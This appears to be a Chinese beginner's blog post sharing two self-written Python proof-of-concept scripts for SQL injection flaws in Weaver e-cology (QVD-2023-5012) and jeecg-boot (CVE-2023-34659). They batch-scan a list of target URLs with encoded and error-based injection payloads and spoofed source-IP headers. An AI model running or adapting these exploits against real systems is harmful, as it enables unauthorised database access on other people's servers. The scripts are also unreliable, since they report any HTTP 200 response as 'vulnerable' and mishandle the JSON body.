1.QVD-2023-5012泛微e-cologySQL注入漏洞
观看大佬们做的实验尝试自己编写POC,来源OidBoy_G
import requests
import sys
def check_url(url):
url = 'http://' + url + '/mobile/plugin/browser.jsp'
data = {
'isDis': '1',
'browserTypeId': '269',
'keyword': '%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%25\
25%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%\
2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%\
2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%256\
3%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%\
2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%253\
9%2525%2532%2562%2525%2532%2537'
}
headers = {
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.\
36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,im\
age/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'x-forwarded-for': '127.0.0.1',
'x-originating-ip': '127.0.0.1',
'x-remote-ip': '127.0.0.1',
'x-remote-addr': '127.0.0.1',
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': str(len(data)),
}
response = requests.post(url, data=data, headers=headers)
if response.status_code == 200:
print(f'{url} is vulnerable')
else:
print(f'{url} is not vulnerable')
if __name__ == '__main__':
if len(sys.argv) != 2:
print('Usage: python check_urls.py urls.txt')
sys.exit(1)
urls_file = sys.argv[1]
with open(urls_file, 'r') as f:
urls = f.read().splitlines()
for url in urls:
check_url(url)
2.CVE-2023-34659_jeecg-boot 3.5.0-3.5.1_SQLi
尝试自己编写,基本样式不变,俩者都需要在同级下创建url.txt,能批量检测
import requests
import sys
def check_url(url):
url = 'http://' + url + '/jeecg-boot/jmreport/show'
data = {
'id': '961455b47c0b86dc961e90b5893bff05',
'apiUrl': '',
"params": {
"id ": "1 ' or ' % 1 % ' like (updatexml(0x3a,concat(1,(version())),1)) or ' % % ' like '"
}
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.\
36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',
'Accept-Encoding': 'gzip',
'Connection': 'close',
'Content-Type': 'application/json;charset=UTF-8',
'Content-Length': str(len(data)),
}
response = requests.post(url, data=data, headers=headers)
if response.status_code == 200:
print(f'{url} is vulnerable')
else:
print(f'{url} is not vulnerable')
if __name__ == '__main__':
if len(sys.argv) != 2:
print('Usage: python check_urls.py urls.txt')
sys.exit(1)
urls_file = sys.argv[1]
with open(urls_file, 'r') as f:
urls = f.read().splitlines()
for url in urls:
check_url(url)
3.总结
初次编写,大佬路过欢迎指点,还有很多的不足,请见谅!